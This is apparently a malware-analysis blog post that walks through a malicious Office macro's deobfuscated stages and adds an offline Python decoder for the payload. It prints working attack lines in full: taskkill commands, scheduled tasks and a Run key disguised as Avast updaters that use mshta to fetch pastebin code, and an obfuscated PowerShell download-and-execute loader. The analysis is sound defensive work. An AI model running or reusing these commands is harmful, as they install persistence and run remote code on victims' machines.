Part 1: Getting through the macros.
We left off looking at the code below. It is split up into four distinct parts and we’ll look at each one in turn.
Part 1: Kill Microsoft
This one is not that complicated. Create the shell object (line 58), put the command string in a variable (line 60), and run it in line 61. Here’s the full string in line 60. Notice how it’s killing a variety of Microsoft apps:
cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
Part 2: Writing to the registry
Again, not too complicated. All it is doing is creating a “WinUpdate” entry in the Run registry key whose command uses mshta.exe to fetch and run the contents of ANOTHER pastebin page. I guess we’d better check that one out, too.
And here we go again! Five rounds later we get…
self.close? I have no idea why that would be put in the run registry, but there we go.
Part 3.1: Avast Updater
So rather than the run registry, let’s make a scheduled task instead! Line 72 is where the magic happens:
69: X_hw0 "schtasks /create /sc MINUTE /mo 300 /t"
70: X_hw1 "n ""Avast Updater"" /tr ""mshta.ex"
71: X_hw2 "e http://pastebin.com/raw/B6DMsewR /F "
72: X_hw schtasks /create /sc MINUTE /mo 300 /tn ""Avast Updater"" /tr ""mshta.exe http://pastebin.com/raw/B6DMsewR /F
Using schtasks.exe, a new task is created (/create) on a minute-based schedule (/sc MINUTE) that fires every 300 minutes (/mo 300), with the task name (/tn) “Avast Updater”; the task action (/tr) is the command “mshta.exe http://pastebin…
Part 3.2: The executable
… four rounds of CyberChef later, we get…
This will be very similar to the ones above. Here it is all laid out and reversed (when necessary):
104: D_XA1 "raw/eD7Nj8tL"
105: D_XA2 "'').replace(''!@#'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)"
106: D_XA0 "Powershell.exe -noexit [Byte]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''https://pastebin.com/"
107: D_XA Powershell.exe -noexit [Byte]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString('https://pastebin.com/raw/eD7Nj8tL ').replace(''!@#'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)
Line 106 is a long one and needs some explanation.
Variable $sc64 is going to be created as a byte array. iex is the alias for Invoke-Expression. GCM *W-O* is an obfuscated way of writing Get-Command New-Object: gcm is the alias for Get-Command, and the wildcard *W-O* resolves to New-Object, so &(GCM *W-O*) Net.WebClient builds a WebClient object. The contents of YET ANOTHER pastebin page are downloaded, and every occurrence of the characters !@# is replaced with 0x, turning the text into a list of hex byte literals. That byte array is then loaded as a .NET assembly with [AppDomain]::CurrentDomain.Load($sc64) and its entry point is invoked.
No! It’s the actual executable! We can now see why the !@# was replaced with a 0x. And if you recall the scheduled task named Avast Updater, this will be downloaded and executed every 300 minutes.
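To recover that payload without letting PowerShell evaluate it, here is an added Python decoder (my own example, not code from the original post or from the sample) that reproduces the replace(''!@#'',''0x'') step offline, parses the resulting byte literals, and checks whether the result has a PE header. The blob format (comma-separated byte literals with !@# in place of 0x) and the stub data are assumptions constructed for the demo.

```python
"""Offline decoder for the '!@#' -> '0x' byte-array trick used by the loader.

The loader hands the downloaded text to iex twice so PowerShell turns it into a
byte array and runs it. Here the same transform is done in Python, so the bytes
can be carved to disk for analysis without executing anything.
"""
import re
import struct

# Constructed sample of the assumed pastebin body: a comma-separated list of
# byte literals with '0x' swapped for '!@#'. It is a minimal stub with an MZ
# header, e_lfanew at offset 0x3C, and a 'PE\0\0' signature; not a real payload.
SAMPLE_BLOB = (
    "!@#4D,!@#5A," + ",".join(["!@#00"] * 58)
    + ",!@#40,!@#00,!@#00,!@#00"      # e_lfanew = 0x40
    + ",!@#50,!@#45,!@#00,!@#00"      # 'PE\0\0' at 0x40
)

HEX_LITERAL = re.compile(r"^0x([0-9A-Fa-f]{1,2})$")


def decode_blob(blob: str, marker: str = "!@#") -> bytes:
    """Apply the loader's replace(marker, '0x') and parse the literals as bytes.

    Anything that is not a one- or two-digit hex literal raises ValueError, so a
    decoy page or a truncated paste fails loudly instead of yielding garbage.
    """
    text = blob.replace(marker, "0x")
    out = bytearray()
    for token in text.split(","):
        m = HEX_LITERAL.match(token.strip())
        if not m:
            raise ValueError(f"unexpected token in byte list: {token!r}")
        out.append(int(m.group(1), 16))
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with 'MZ' and e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


if __name__ == "__main__":
    payload = decode_blob(SAMPLE_BLOB)
    print(f"{len(payload)} bytes decoded, PE header present: {looks_like_pe(payload)}")
    with open("carved_payload.bin", "wb") as fh:   # write out for static analysis
        fh.write(payload)
```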
Part 4: Avast backup
This looks familiar.
77: P_wx0 "schtasks /create /sc MINUTE /mo 300 /t"
78: P_wx1 "n ""Avast backup"" /tr ""mshta.ex"
79: P_wx2 "e http://pastebin.com/raw/pQiwYgDK"" /F "
80: P_wx "schtasks /create /sc MINUTE /mo 300 /tn ""Avast backup"" /tr ""mshta.exe http://pastebin.com/raw/pQiwYgDK"" /F "
Another self.close? Well, at this point, I’ll take it.
That’s it for now! Thanks for reading.